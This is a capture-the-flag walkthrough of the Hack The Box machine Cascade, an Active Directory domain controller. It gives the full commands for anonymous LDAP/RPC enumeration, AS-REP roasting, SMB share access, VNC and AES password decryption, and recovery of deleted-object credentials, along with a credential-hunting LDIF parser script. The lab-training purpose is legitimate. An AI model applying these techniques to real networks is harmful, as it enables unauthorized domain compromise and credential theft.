This post documents the complete walkthrough of Cascade, a retired vulnerable VM created by VbScrub, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.

Background

Cascade is a retired vulnerable VM from Hack The Box.

Information Gathering

Let’s start with a masscan probe to establish the open ports on the host.

# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.182 --rate=500

Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-03-29 10:16:44 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 636/tcp on 10.10.10.182
Discovered open port 49154/tcp on 10.10.10.182
Discovered open port 3269/tcp on 10.10.10.182
Discovered open port 53/tcp on 10.10.10.182
Discovered open port 389/tcp on 10.10.10.182
Discovered open port 139/tcp on 10.10.10.182
Discovered open port 88/tcp on 10.10.10.182
Discovered open port 49155/tcp on 10.10.10.182
Discovered open port 135/tcp on 10.10.10.182
Discovered open port 49173/tcp on 10.10.10.182
Discovered open port 49158/tcp on 10.10.10.182
Discovered open port 445/tcp on 10.10.10.182
Discovered open port 3268/tcp on 10.10.10.182
Discovered open port 53/udp on 10.10.10.182
Discovered open port 49157/tcp on 10.10.10.182
Discovered open port 5985/tcp on 10.10.10.182

The list of open ports resembles that of a Windows machine, and not just any Windows machine: Kerberos (88), LDAP (389/636) and the Global Catalog ports (3268/3269) next to SMB and RPC say domain controller. Let’s do one better with nmap against the discovered ports to establish the services and their versions.

# nmap -n -v -Pn -p53,88,135,139,389,445,636,3268,3269,5985,49154,49155,49157,49158,49173 -A --reason 10.10.10.182 -oN nmap.txt
...
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2020-03-29 10:22:45Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49154/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49157/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49173/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC

Looks like we have a Windows Active Directory server: the domain controller for cascade.local, running Windows Server 2008 R2 according to the DNS banner, with WinRM (5985) listening, which will matter later when we want a shell. :wink:

RPC Enumeration

Since RPC is available, let’s see what the good ol’ rpcclient reveals. -U% asks for a null session, i.e. no credentials at all; a DC that answers enumdomusers anonymously is already a finding in its own right.

# rpcclient -U% -c enumdomusers 10.10.10.182
user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]

Cool. We have a list of users (saved to usernames.txt). Now, we are going for the low-hanging fruit, AS-REP roasting: for any account with “Do not require Kerberos pre-authentication” set, the KDC hands back an AS-REP without a password, and the encrypted part of that reply can be cracked offline. GetNPUsers.py can take the whole list in one go with -usersfile, but a loop works too.

# for user in $(cat usernames.txt); do python3 GetNPUsers.py -no-pass -dc-ip 10.10.10.182 "cascade/$user"; done
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for CascGuest
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for arksvc
[-] User arksvc doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for s.smith
[-] User s.smith doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for r.thompson
[-] User r.thompson doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for util
[-] User util doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for j.wakefield
[-] User j.wakefield doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for s.hickson
[-] User s.hickson doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for j.goodhand
[-] User j.goodhand doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for a.turnbull
[-] User a.turnbull doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for e.crowe
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for b.hanson
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for d.burman
[-] User d.burman doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for BackupSvc
[-] User BackupSvc doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for j.allen
[-] User j.allen doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for i.croft
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)

Hmm. No easy path in. The four KDC_ERR_CLIENT_REVOKED replies (CascGuest, e.crowe, b.hanson, i.croft) mean the KDC refuses to issue tickets for those accounts at all, which is what a disabled or locked-out account looks like from the outside; every other account has pre-authentication enforced, so there is nothing to roast. Don’t worry, let’s check the domain password policy.

# rpcclient -U% -c getdompwinfo 10.10.10.182
min_password_length: 5
password_properties: 0x00000000

OK. A five-character minimum and password_properties 0x00000000, i.e. the DOMAIN_PASSWORD_COMPLEX bit is clear and there is no complexity requirement. That is a weak policy, but this call says nothing about the lockout threshold, so spraying blind would be a gamble. What else can we find?

Lightweight Directory Access Protocol (LDAP) Enumeration

Active Directory is an LDAP directory underneath, and this DC accepts an anonymous simple bind (ldapsearch -x with no -D/-w), so we can pull the whole naming context without a credential. Newer OpenLDAP clients have dropped -h; use -H ldap://10.10.10.182 there. Let’s see what we can glean with ldapsearch.

# ldapsearch -h 10.10.10.182 -x -b "dc=cascade,dc=local"
...
# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ryan Thompson
sn: Thompson
givenName: Ryan
distinguishedName: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109193126.0Z
whenChanged: 20200323112031.0Z
displayName: Ryan Thompson
uSNCreated: 24610
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
uSNChanged: 295010
name: Ryan Thompson
objectGUID:: LfpD6qngUkupEy9bFXBBjA==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132299650192994271
lastLogoff: 0
lastLogon: 132299662254155455
pwdLastSet: 132230718862636251
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFVQQAAA==
accountExpires: 9223372036854775807
logonCount: 2
sAMAccountName: r.thompson
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200126183918.0Z
dSCorePropagationData: 20200119174753.0Z
dSCorePropagationData: 20200119174719.0Z
dSCorePropagationData: 20200119174508.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132294360317419816
msDS-SupportedEncryptionTypes: 0
cascadeLegacyPwd: clk0bjVldmE=

Looks like someone is keeping an old password in the directory! cascadeLegacyPwd is not a standard AD attribute but a custom schema extension, and anonymous readers can see it. The value is plain base64, not encryption, so it decodes like so.

# echo -n clk0bjVldmE= | base64 -d; echo
rY4n5eva
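Reading a full ldapsearch dump by eye does not scale past a handful of users, so here is a small triage script I added for this write-up (it is not code from the original post). It parses the LDIF, decodes the binary objectSid (the RID it yields, 1109, is the 0x455 that rpcclient reported for r.thompson), expands userAccountControl into named flags, which is the LDAP-side version of the GetNPUsers check (DONT_REQ_PREAUTH) and also explains the KDC_ERR_CLIENT_REVOKED replies (ACCOUNTDISABLE), and flags non-standard attributes whose names suggest a credential, decoding them when they are base64. The embedded LDIF is a trimmed copy of the r.thompson entry above plus a second entry, lab.roast, constructed purely to show a pre-auth-disabled account; lab.roast is not a user on Cascade.

```python
"""Triage of ldapsearch (LDIF) output: decode objectSid, expand
userAccountControl, and flag custom attributes that look like credentials.
Added example; not code from the original post."""
import base64
import re
import struct

# Selected userAccountControl bits (MS-ADTS), lowest bit first.
UAC_FLAGS = [(0x2, "ACCOUNTDISABLE"), (0x20, "PASSWD_NOTREQD"),
             (0x200, "NORMAL_ACCOUNT"), (0x10000, "DONT_EXPIRE_PASSWORD"),
             (0x80000, "TRUSTED_FOR_DELEGATION"), (0x400000, "DONT_REQ_PREAUTH")]
# Standard attributes whose names match SECRET_NAME but hold no secret.
BENIGN = {"pwdLastSet", "badPwdCount", "badPasswordTime", "pwdProperties"}
SECRET_NAME = re.compile(r"pwd|pass|secret|cred", re.IGNORECASE)
ATTR_RE = re.compile(r"^([A-Za-z][\w.;-]*)(::?) ?(.*)$")

# Constructed input: the r.thompson entry from the ldapsearch output above,
# trimmed to what matters, plus a second entry (lab.roast) invented only to
# show a pre-auth-disabled account.  lab.roast does not exist on Cascade.
SAMPLE_LDIF = """\
# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: user
userAccountControl: 66048
badPwdCount: 0
objectSid:: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFVQQAAA==
sAMAccountName: r.thompson
cascadeLegacyPwd: clk0bjVldmE=

dn: CN=Lab Roast,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: user
userAccountControl: 4194816
sAMAccountName: lab.roast
"""


def parse_ldif(text):
    """Split LDIF (RFC 2849) into {attribute: [values]} dicts; '::' values
    are base64 and come back as bytes, ': ' values as str."""
    text = re.sub(r"\n ", "", text)          # unfold continuation lines
    entries, current = [], {}
    for line in text.splitlines() + [""]:    # trailing "" flushes the last entry
        if line.startswith("#"):
            continue
        if not line.strip():
            if current:
                entries.append(current)
            current = {}
            continue
        match = ATTR_RE.match(line)
        if match:
            name, sep, value = match.groups()
            current.setdefault(name, []).append(
                base64.b64decode(value) if sep == "::" else value)
    return entries


def sid_to_string(blob):
    """Binary SID: revision, sub-authority count, 6-byte big-endian
    authority, then little-endian uint32 sub-authorities (last one = RID)."""
    revision, count = blob[0], blob[1]
    authority = int.from_bytes(blob[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, blob, 8)
    return "S-%d-%d-%s" % (revision, authority, "-".join(map(str, subs)))


def decode_if_base64(value):
    """Printable ASCII that a base64 string decodes to, else None."""
    try:
        raw = base64.b64decode(value, validate=True)
    except ValueError:
        return None
    text = raw.decode("ascii") if raw.isascii() else ""
    return text if text and text.isprintable() else None


def audit_entry(entry):
    """Summarise one user object for the attacker's checklist."""
    uac = int(entry.get("userAccountControl", ["0"])[0])
    sid_blob = entry.get("objectSid", [None])[0]
    sid = sid_to_string(sid_blob) if isinstance(sid_blob, bytes) else None
    leaked = {}
    for name, values in entry.items():
        if name in BENIGN or not SECRET_NAME.search(name):
            continue
        for value in (v for v in values if isinstance(v, str)):
            decoded = decode_if_base64(value)
            leaked[name] = value if decoded is None else decoded
    return {
        "sAMAccountName": entry.get("sAMAccountName", ["?"])[0],
        "objectSid": sid,
        "rid": int(sid.rsplit("-", 1)[1]) if sid else None,
        "uac_flags": [flag for bit, flag in UAC_FLAGS if uac & bit],
        "disabled": bool(uac & 0x2),
        # a disabled account gets KDC_ERR_CLIENT_REVOKED even without pre-auth
        "asrep_roastable": bool(uac & 0x400000) and not uac & 0x2,
        "leaked": leaked,
    }


def audit_ldif(text):
    """Audit every user object in an ldapsearch dump."""
    return [audit_entry(e) for e in parse_ldif(text)
            if "user" in e.get("objectClass", [])]
```

Feed it the raw file (`ldapsearch ... > users.ldif`, then `audit_ldif(open("users.ldif").read())`) and you get one dict per user: r.thompson comes back with flags NORMAL_ACCOUNT and DONT_EXPIRE_PASSWORD, not roastable, and cascadeLegacyPwd already decoded to rY4n5eva; the constructed lab.roast entry comes back as roastable. The attribute-name regex is deliberately loose; tighten BENIGN for your own environment rather than trusting every hit.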

Let’s see what else we can enumerate now that we have a credential (r.thompson:rY4n5eva).

SMB Enumeration

I’ve heard so many good things about CrackMapExec (CME) but never had the chance to use it. Now is a wonderful opportunity.

CME’s share listing (not reproduced here) shows that r.thompson can read a share named Data. Time to mount the share and enumerate further to our hearts’ content. To mount an SMB share on Linux, we can use mount with the cifs type like so. Note that this puts the password on the command line and in shell history; on a real engagement use a credentials= file instead.

# mkdir Data; mount -t cifs -o rw,username=r.thompson,password=rY4n5eva //10.10.10.182/Data ./Data
# ls -laR Data/
Data/:
total 8
drwxr-xr-x 2 root root 4096 Jan 27 03:27 .
drwxr-xr-x 3 root root 4096 Mar 29 16:11 ..
drwxr-xr-x 2 root root    0 Jan 13 01:45 Contractors
drwxr-xr-x 2 root root    0 Jan 13 01:45 Finance
drwxr-xr-x 2 root root    0 Jan 28 18:04 IT
drwxr-xr-x 2 root root    0 Jan 13 01:45 Production
drwxr-xr-x 2 root root    0 Jan 13 01:45 Temps

Data/Contractors:
ls: reading directory 'Data/Contractors': Permission denied
total 0

Data/Finance:
ls: reading directory 'Data/Finance': Permission denied
total 0

Data/IT:
total 4
drwxr-xr-x 2 root root    0 Jan 28 18:04  .
drwxr-xr-x 2 root root 4096 Jan 27 03:27  ..
drwxr-xr-x 2 root root    0 Jan 28 18:00 'Email Archives'
drwxr-xr-x 2 root root    0 Jan 28 18:04  LogonAudit
drwxr-xr-x 2 root root    0 Jan 29 00:53  Logs
drwxr-xr-x 2 root root    0 Jan 28 22:06  Temp

'Data/IT/Email Archives':
total 4
drwxr-xr-x 2 root root    0 Jan 28 18:00 .
drwxr-xr-x 2 root root    0 Jan 28 18:04 ..
-rwxr-xr-x 1 root root 2522 Jan 28 18:00 Meeting_Notes_June_2018.html

Data/IT/LogonAudit:
total 4
drwxr-xr-x 2 root root    0 Jan 28 18:04 .
drwxr-xr-x 2 root root 4096 Jan 28 18:04 ..

Data/IT/Logs:
total 8
drwxr-xr-x 2 root root 4096 Jan 29 00:53  .
drwxr-xr-x 2 root root 4096 Jan 28 18:04  ..
drwxr-xr-x 2 root root    0 Jan 10 16:33 'Ark AD Recycle Bin'
drwxr-xr-x 2 root root    0 Jan 29 00:56  DCs

'Data/IT/Logs/Ark AD Recycle Bin':
total 8
drwxr-xr-x 2 root root    0 Jan 10 16:33 .
drwxr-xr-x 2 root root 4096 Jan 29 00:53 ..
-rwxr-xr-x 1 root root 1303 Jan 29 01:19 ArkAdRecycleBin.log

Data/IT/Logs/DCs:
total 12
drwxr-xr-x 2 root root    0 Jan 29 00:56 .
drwxr-xr-x 2 root root 4096 Jan 29 00:53 ..
-rwxr-xr-x 1 root root 5967 Jan 10 16:17 dcdiag.log

Data/IT/Temp:
total 4
drwxr-xr-x 2 root root    0 Jan 28 22:06 .
drwxr-xr-x 2 root root 4096 Jan 28 18:04 ..
drwxr-xr-x 2 root root    0 Jan 28 22:06 r.thompson
drwxr-xr-x 2 root root    0 Jan 28 20:00 s.smith

Data/IT/Temp/r.thompson:
total 0
drwxr-xr-x 2 root root 0 Jan 28 22:06 .
drwxr-xr-x 2 root root 0 Jan 28 22:06 ..

Data/IT/Temp/s.smith:
total 4
drwxr-xr-x 2 root root    0 Jan 28 20:00  .
drwxr-xr-x 2 root root    0 Jan 28 22:06  ..
-rwxr-xr-x 1 root root 2680 Jan 28 19:27 'VNC Install.reg'

Data/Production:
ls: reading directory 'Data/Production': Permission denied
total 0

Data/Temps:
ls: reading directory 'Data/Temps': Permission denied
total 0

I wonder what’s in these files?

Meeting_Notes_June_2018.html (the email body is not reproduced here; the detail that matters later is that the temporary admin account was given the same password as the normal administrator account)

ArkAdRecycleBin.log
1/10/2018 15:43	[MAIN_THREAD]	** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
1/10/2018 15:43	[MAIN_THREAD]	Validating settings...
1/10/2018 15:43	[MAIN_THREAD]	Error: Access is denied
1/10/2018 15:43	[MAIN_THREAD]	Exiting with error code 5
2/10/2018 15:56	[MAIN_THREAD]	** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
2/10/2018 15:56	[MAIN_THREAD]	Validating settings...
2/10/2018 15:56	[MAIN_THREAD]	Running as user CASCADE\ArkSvc
2/10/2018 15:56	[MAIN_THREAD]	Moving object to AD recycle bin CN=Test,OU=Users,OU=UK,DC=cascade,DC=local
2/10/2018 15:56	[MAIN_THREAD]	Successfully moved object. New location CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
2/10/2018 15:56	[MAIN_THREAD]	Exiting with error code 0
8/12/2018 12:22	[MAIN_THREAD]	** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
8/12/2018 12:22	[MAIN_THREAD]	Validating settings...
8/12/2018 12:22	[MAIN_THREAD]	Running as user CASCADE\ArkSvc
8/12/2018 12:22	[MAIN_THREAD]	Moving object to AD recycle bin CN=TempAdmin,OU=Users,OU=UK,DC=cascade,DC=local
8/12/2018 12:22	[MAIN_THREAD]	Successfully moved object. New location CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
8/12/2018 12:22	[MAIN_THREAD]	Exiting with error code 0

Nothing interesting with dcdiag.log so I’ll skip it—it’s a wall of text. :laughing:

Last but not least.

VNC Install.reg
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"DisconnectClients"=dword:00000001
"PollingInterval"=dword:000003e8
"AllowLoopback"=dword:00000000
"VideoRecognitionInterval"=dword:00000bb8
"GrabTransparentWindows"=dword:00000001
"SaveLogToAllUsersPath"=dword:00000000
"RunControlInterface"=dword:00000001
"IdleTimeout"=dword:00000000
"VideoClasses"=""
"VideoRects"=""

What have we here. VNC password??!!

VNC Password Decryption

We can easily reveal the plaintext password even though it’s “encrypted”: VNC stores the password DES-encrypted under a fixed key that ships in every VNC implementation’s source, so anyone holding the registry value can reverse it. This is obfuscation, not protection, and vncpwd does the reversing for us.

# echo -n 6b,cf,2a,4b,6e,5a,ca,0f | tr -d ',' | xxd -p -r > s.smith.vnc && ./vncpwd s.smith.vnc
Password: sT333ve2

Low-Privilege Shell

Armed with s.smith’s password, we can use Evil-WinRM over port 5985 to get a shell. That works because s.smith is a member of the Remote Management Users group (the session output is omitted here).

Awesome. The file user.txt is on s.smith’s desktop.

Privilege Escalation

During enumeration of s.smith’s account, I notice he can access a hidden share. Recall the LDAP enumeration? There was some foreshadowing of things to come in there.

Check this out.

These three files, Audit.db, CascAudit.exe and CascCrypto.dll, look interesting. Better copy them to my analysis machine for some dissection. I’ll leave it as an exercise how to transfer the files over. Hint: nc.exe from Kali Linux, or simply Evil-WinRM’s built-in download command.

SQLite 3 and .NET Disassembly

Turns out that Audit.db is a SQLite 3 file; sqlite3 Audit.db .dump gives us the schema and the rows.

PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE IF NOT EXISTS "Ldap" (
        "Id"    INTEGER PRIMARY KEY AUTOINCREMENT,
        "uname" TEXT,
        "pwd"   TEXT,
        "domain"        TEXT
);
INSERT INTO Ldap VALUES(1,'ArkSvc','BQO5l5Kj9MdErXx6Q6AGOw==','cascade.local');
CREATE TABLE IF NOT EXISTS "Misc" (
        "Id"    INTEGER PRIMARY KEY AUTOINCREMENT,
        "Ext1"  TEXT,
        "Ext2"  TEXT
);
CREATE TABLE IF NOT EXISTS "DeletedUserAudit" (
        "Id"    INTEGER PRIMARY KEY AUTOINCREMENT,
        "Username"      TEXT,
        "Name"  TEXT,
        "DistinguishedName"     TEXT
);
INSERT INTO DeletedUserAudit VALUES(6,'test',replace('Test\nDEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d','\n',char(10)),'CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local');
INSERT INTO DeletedUserAudit VALUES(7,'deleted',replace('deleted guy\nDEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef','\n',char(10)),'CN=deleted guy\0ADEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef,CN=Deleted Objects,DC=cascade,DC=local');
INSERT INTO DeletedUserAudit VALUES(9,'TempAdmin',replace('TempAdmin\nDEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a','\n',char(10)),'CN=TempAdmin\0ADEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a,CN=Deleted Objects,DC=cascade,DC=local');
DELETE FROM sqlite_sequence;
INSERT INTO sqlite_sequence VALUES('Ldap',2);
INSERT INTO sqlite_sequence VALUES('DeletedUserAudit',10);
COMMIT;

So the Ldap table holds the ArkSvc credential that CascAudit.exe binds with, and DeletedUserAudit overlaps with the deletions recorded in ArkAdRecycleBin.log (Test and TempAdmin again, although the TempAdmin GUID differs between the two). The pwd value decodes to exactly 16 bytes, one AES block, so unlike cascadeLegacyPwd this is real ciphertext rather than just base64.

Long story short, CascCrypto.dll has a Crypto class with a DecryptString method that decrypts arksvc’s password. Opening the binaries in a .NET decompiler (dnSpy or ILSpy will do) shows that DecryptString base64-decodes its input and runs AES-128 in CBC mode, and that the key (c4scadek3y654321) and IV (1tdyjCbY1Ix49842) are hard-coded. That is the whole weakness: anyone who can read the binaries can read every password they protect.

We have all we need to decrypt the password like so. -nopad leaves any padding bytes in the output; they are unprintable, so the terminal hides them.

# echo -n BQO5l5Kj9MdErXx6Q6AGOw== | base64 -d | openssl enc -aes-128-cbc -d -nosalt -nopad -K $(echo -n c4scadek3y654321 | iconv -t UTF-8 | xxd -p) -iv $(echo -n 1tdyjCbY1Ix49842 | iconv -t UTF-8 | xxd -p); echo
w3lc0meFr31nd

We now have arksvc’s credential (arksvc:w3lc0meFr31nd). arksvc is also a member of the Remote Management Users group. Let’s log in with Evil-WinRM.

Sweet.

Active Directory Recycle Bin

The log told us TempAdmin was moved into CN=Deleted Objects, which only happens when the Active Directory Recycle Bin optional feature is enabled on the forest. That distinction matters: with the Recycle Bin enabled, a deleted object keeps all of its attributes, cascadeLegacyPwd included, until the deleted-object lifetime expires (180 days by default on a modern forest); without it, a tombstone keeps only a handful of attributes and the password would be gone. We have also previously established that arksvc is a member of the AD Recycle Bin group, which grants read access to the deleted objects container, exactly the permission we need to query it.

We can search for deleted objects with the Get-ADObject cmdlet like so.

Get-ADObject -Filter 'displayName -eq "TempAdmin"' -SearchBase "CN=Deleted Objects,DC=cascade,DC=local" -IncludeDeleted -Properties * | fl

accountExpires                  : 9223372036854775807
badPasswordTime                 : 0
badPwdCount                     : 0
CanonicalName                   : cascade.local/Deleted Objects/TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd                : YmFDVDNyMWFOMDBkbGVz
CN                              : TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage                        : 0
countryCode                     : 0
Created                         : 1/27/2020 3:23:08 AM
createTimeStamp                 : 1/27/2020 3:23:08 AM
Deleted                         : True
Description                     :
DisplayName                     : TempAdmin
DistinguishedName               : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData           : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName                       : TempAdmin
instanceType                    : 4
isDeleted                       : True
LastKnownParent                 : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff                      : 0
lastLogon                       : 0
logonCount                      : 0
Modified                        : 1/27/2020 3:24:34 AM
modifyTimeStamp                 : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN               : TempAdmin
Name                            : TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  :
ObjectClass                     : user
ObjectGUID                      : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid                       : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID                  : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet                      : 132245689883479503
sAMAccountName                  : TempAdmin
sDRightsEffective               : 0
userAccountControl              : 66048
userPrincipalName               : [email protected]
uSNChanged                      : 237705
uSNCreated                      : 237695
whenChanged                     : 1/27/2020 3:24:34 AM
whenCreated                     : 1/27/2020 3:23:08 AM

Another cascadeLegacyPwd attribute??!! Same encoding as before; decode it like so.

# echo -n YmFDVDNyMWFOMDBkbGVz | base64 -d; echo
baCT3r1aN00dles

Recall from the email that TempAdmin was given the same password as the administrator account? I sense the end is near…

Indeed. Logging in as the administrator with that password, root.txt is one command away.

:dancer: